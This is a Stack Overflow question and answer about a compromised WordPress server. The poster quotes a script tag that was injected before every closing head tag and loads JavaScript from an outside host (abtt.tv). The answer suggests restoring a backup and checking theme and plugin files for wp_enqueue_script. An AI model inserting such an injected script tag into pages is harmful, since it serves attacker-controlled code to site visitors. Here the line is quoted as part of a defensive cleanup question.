0

It appears there is a new exploit/hack going around where a Wordpress plugin is writing a .js file before every closing </head> tags in every Wordpress installation's .php files on my server. It's writing this code before every closing head tag:

<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>

My question is, how would I go about finding which files are writing code to others? That way I can find which plugin it is doing it, as I have several installations of WP in subdomains that are infected, and no idea of which one it's coming from! I'm sure there has to be a way to monitor this, whether it be my hosting company doing it or me.

Improve this question
2
  • Welcome to StackOverflow! You mention that more on the issue "can be found here" but don't currently provide a link. Commented Apr 15, 2013 at 11:06
  • Removed link, but added the code - think mod must of deleted link sorry didn't know wasn't allowed if you do a google search with that script language though its the only topic you'll find on this matter. Commented Apr 15, 2013 at 11:08

1 Answer 1

Reset to default
1

If your site has been compromised, your better of by restoring a backup, but if you dont have one you're probably better of with a clean installation. But if you still wanna try to "fix" it, there are some files you could check for starters, the header theme file, the function file and all the plugin files to ensure its not enqued in a plugin to run.

the function you should be searching for is called wp_enqueue_script

Improve this answer
Sign up to request clarification or add additional context in comments.

Comments

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.